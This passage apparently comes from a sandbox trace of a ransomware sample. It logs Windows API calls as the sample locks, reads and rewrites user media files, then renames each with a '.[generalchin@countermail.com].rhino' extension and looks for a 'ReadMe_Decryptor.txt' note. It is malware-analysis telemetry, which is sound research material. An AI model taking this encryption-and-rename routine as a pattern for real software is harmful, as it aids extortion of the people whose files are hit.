Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x764450 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x7646e0 [0086.532] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764450 | out: hHeap=0x6d0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x7647c0 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7646e0 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x764908 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7647c0 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x764af0 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764908 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x764dc0 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764af0 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7646e0 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764dc0 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x764d28 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7646e0 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x765690 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764d28 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7664a8 [0086.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765690 | out: hHeap=0x6d0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7679e8 [0086.534] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7664a8 | out: hHeap=0x6d0000) returned 1 [0086.534] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7646e0 [0086.534] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7679e8 | out: hHeap=0x6d0000) returned 1 [0086.534] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x767678 [0086.534] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7646e0 | out: hHeap=0x6d0000) returned 1 [0086.534] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x72bfe8 [0086.535] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767678 | out: hHeap=0x6d0000) returned 1 [0086.535] WriteFile (in: hFile=0xec, lpBuffer=0x72c000*, nNumberOfBytesToWrite=0x55c6, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x72c000*, lpNumberOfBytesWritten=0x2cfa04*=0x55c6, lpOverlapped=0x0) returned 1 [0086.535] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.535] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x55c6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.535] CloseHandle (hObject=0xec) returned 1 [0086.537] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x764450 [0086.537] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7646e0 [0086.537] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764450 | out: hHeap=0x6d0000) returned 1 [0086.537] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JFswZvJ4Guw8UXBBx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jfswzvj4guw8uxbbx.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JFswZvJ4Guw8UXBBx.jpg.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jfswzvj4guw8uxbbx.jpg.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7646e0 | out: hHeap=0x6d0000) returned 1 [0086.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764558 | out: hHeap=0x6d0000) returned 1 [0086.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JY1dPkaR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jy1dpkar.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.539] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x17720 [0086.540] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17840, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.540] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.540] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.541] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.541] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x17720, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x17720, lpOverlapped=0x0) returned 1 [0086.542] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.542] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.542] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.542] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.543] GetLastError () returned 0x0 [0086.543] SetLastError (dwErrCode=0x0) [0086.543] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.543] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17743) returned 0x70a650 [0086.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x721da0 [0086.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x721ea8 [0086.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721da0 | out: hHeap=0x6d0000) returned 1 [0086.545] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x721da0 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x722030 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721da0 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x722110 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722030 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x722258 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722110 | out: hHeap=0x6d0000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x722440 [0086.546] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722258 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x722710 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722440 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x722030 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722710 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x722678 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722030 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x722fe0 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722678 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x723df8 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722fe0 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x725338 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723df8 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x722030 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x725338 | out: hHeap=0x6d0000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x724fc8 [0086.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722030 | out: hHeap=0x6d0000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0086.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x724fc8 | out: hHeap=0x6d0000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x72bfe8 [0086.549] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0086.551] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.551] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0086.553] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x23b0048 [0086.557] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0086.557] WriteFile (in: hFile=0xec, lpBuffer=0x23b0060*, nNumberOfBytesToWrite=0x17840, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0060*, lpNumberOfBytesWritten=0x2cfa04*=0x17840, lpOverlapped=0x0) returned 1 [0086.558] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0086.558] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17840, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.558] CloseHandle (hObject=0xec) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0086.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x721da0 [0086.561] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.561] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JY1dPkaR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jy1dpkar.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JY1dPkaR.mp4.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jy1dpkar.mp4.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721da0 | out: hHeap=0x6d0000) returned 1 [0086.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721ea8 | out: hHeap=0x6d0000) returned 1 [0086.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0086.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LsgsrpB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lsgsrpb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.576] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xc21a [0086.576] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc33a, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.576] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.576] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.578] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.578] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xc21a, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xc21a, lpOverlapped=0x0) returned 1 [0086.579] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.579] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.579] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.579] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.579] GetLastError () returned 0x0 [0086.579] SetLastError (dwErrCode=0x0) [0086.579] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.579] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc23d) returned 0x75ef78 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x76b1c0 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x76b2c8 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b1c0 | out: hHeap=0x6d0000) returned 1 [0086.581] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0086.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x76b1c0 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x76b450 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b1c0 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x76b530 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x6d0000) returned 1 [0086.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x76b678 [0086.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b530 | out: hHeap=0x6d0000) returned 1 [0086.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x76b860 [0086.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x6d0000) returned 1 [0086.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x76bb30 [0086.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b860 | out: hHeap=0x6d0000) returned 1 [0086.583] RtlAllocateHeap 